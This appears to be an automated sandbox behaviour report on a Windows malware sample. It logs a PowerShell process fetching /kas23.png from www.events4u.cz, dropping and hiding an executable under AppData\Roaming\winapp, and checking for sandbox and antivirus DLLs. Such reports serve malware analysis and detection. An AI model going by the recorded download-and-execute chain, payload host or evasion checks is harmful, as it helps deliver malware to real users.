| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
2 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance |
|
1 | ||
| Open Key | HKEY_CURRENT_USER |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe | show_window = SW_SHOWNORMAL |
|
1 | |
| Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | ||
| Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | ||
| Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | ||
| Map | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = AUFDDCNTXWT |
|
1 | |
| Get Info | type = Operating System |
|
6 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
10 | |
| Create | mutex_name = Global\.net clr networking |
|
1 | |
| Create | mutex_name = Global\.net clr networking |
|
5 | |
| Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
5 | |
| Release | mutex_name = Global\.net clr networking |
|
5 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
94 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Users\aDU0VK IWA5kLS\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = www.events4u.cz, address_out = 93.185.102.11 |
|
1 |
| Information | Value |
|---|---|
| Total Data Sent | 0.07 KB (74 bytes) |
| Total Data Received | 472.33 KB (483666 bytes) |
| Contacted Host Count | 1 |
| Contacted Hosts | 93.185.102.11:80 |
| Information | Value |
|---|---|
| Handle | 0x4a4 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 93.185.102.11 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 1728 |
| Data Sent | 0.07 KB (74 bytes) |
| Data Received | 472.33 KB (483666 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 93.185.102.11, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 74, size_out = 74 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4096, size_out = 4096 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8776 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 56628 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 4356 |
|
3 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8516 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3472 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 884 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 56628 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 63888 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 29040 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3472 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3788 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 59532 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 39354, size_out = 5808 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 33546, size_out = 1452 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 32094, size_out = 32094 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
| Information | Value |
|---|---|
| Total Data Sent | 0.07 KB (74 bytes) |
| Total Data Received | 472.33 KB (483666 bytes) |
| Contacted Host Count | 1 |
| Contacted Hosts | www.events4u.cz |
| Information | Value |
|---|---|
| Server Name | www.events4u.cz |
| Server Port | 80 |
| Data Sent | 0.07 KB (74 bytes) |
| Data Received | 472.33 KB (483666 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = www.events4u.cz, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /kas23.png |
|
1 | |
| Send HTTP Request | headers = host: www.events4u.cz, connection: Keep-Alive, url = www.events4u.cz/kas23.png |
|
1 | |
| Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 8776 |
|
1 | |
| Read Response | size = 65536, size_out = 56628 |
|
1 | |
| Read Response | size = 65536, size_out = 4356 |
|
3 | |
| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 8516 |
|
1 | |
| Read Response | size = 65536, size_out = 3472 |
|
1 | |
| Read Response | size = 65536, size_out = 884 |
|
1 | |
| Read Response | size = 65536, size_out = 56628 |
|
1 | |
| Read Response | size = 65536, size_out = 63888 |
|
1 | |
| Read Response | size = 65536, size_out = 29040 |
|
1 | |
| Read Response | size = 65536, size_out = 3472 |
|
1 | |
| Read Response | size = 65536, size_out = 3788 |
|
1 | |
| Read Response | size = 65536, size_out = 59532 |
|
1 | |
| Read Response | size = 39354, size_out = 5808 |
|
1 | |
| Read Response | size = 33546, size_out = 1452 |
|
1 | |
| Read Response | size = 32094, size_out = 32094 |
|
1 | |
| Close Session |
|
1 |
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\users\adu0vk~1\appdata\local\temp\mvmubw.exe |
| Command Line | "C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe" |
| Initial Working Directory | C:\Users\aDU0VK IWA5kLS\Desktop\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:02:26, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:01 |
| Information | Value |
|---|---|
| PID | 0xb18 |
| Parent PID | 0xa40 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | AUFDDCNTXWT\aDU0VK IWA5kLS |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B1C
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 472.00 KB (483328 bytes) |
MD5:
0ebfd6e45dea48c7f54b5574d69da458
SHA1: 11ad0fae8318bc72e1525c161c5df72a9da9430b SHA256: 3ba1b55c3268529b586e154b9117d25ae6c3667a2e869747c51bd88fd2a7a581 |
|
|
| c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aDU0VK IWA5kLS\Desktop | desired_access = GENERIC_READ |
|
1 | |
| Create Directory | C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp |
|
1 | ||
| Copy | C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe | source_filename = C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ | value_name = ProductName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ | value_name = ProductName, data = 87 |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe | os_pid = 0xb68, show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | Kernel32.dll | base_address = 0x75dc0000 |
|
1 | |
| Load | shell32.dll | base_address = 0x75fe0000 |
|
1 | |
| Load | ntdll.dll | base_address = 0x77720000 |
|
1 | |
| Load | shlwapi.dll | base_address = 0x76f10000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x77280000 |
|
1 | |
| Get Handle | c:\users\adu0vk~1\appdata\local\temp\mvmubw.exe | base_address = 0x400000 |
|
3 | |
| Get Handle | cmdvrt32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | SxIn.dll | base_address = 0x0 |
|
1 | |
| Get Handle | SbieDll.dll | base_address = 0x0 |
|
1 | |
| Get Handle | Sf2.dll | base_address = 0x0 |
|
1 | |
| Get Handle | snxhk.dll | base_address = 0x0 |
|
1 | |
| Get Handle | dbghelp.dll | base_address = 0x0 |
|
1 | |
| Get Handle | api_log.dll | base_address = 0x0 |
|
1 | |
| Get Handle | dir_watch.dll | base_address = 0x0 |
|
1 | |
| Get Handle | pstorec.dll | base_address = 0x0 |
|
1 | |
| Get Handle | vmcheck.dll | base_address = 0x0 |
|
1 | |
| Get Handle | wpespy.dll | base_address = 0x0 |
|
1 | |
| Get Filename | wpespy.dll | process_name = c:\users\adu0vk~1\appdata\local\temp\mvmubw.exe, file_name_orig = C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x75dd7a10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualProtect, address_out = 0x75dd435f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAlloc, address_out = 0x75dd1856 |
|
1 | |
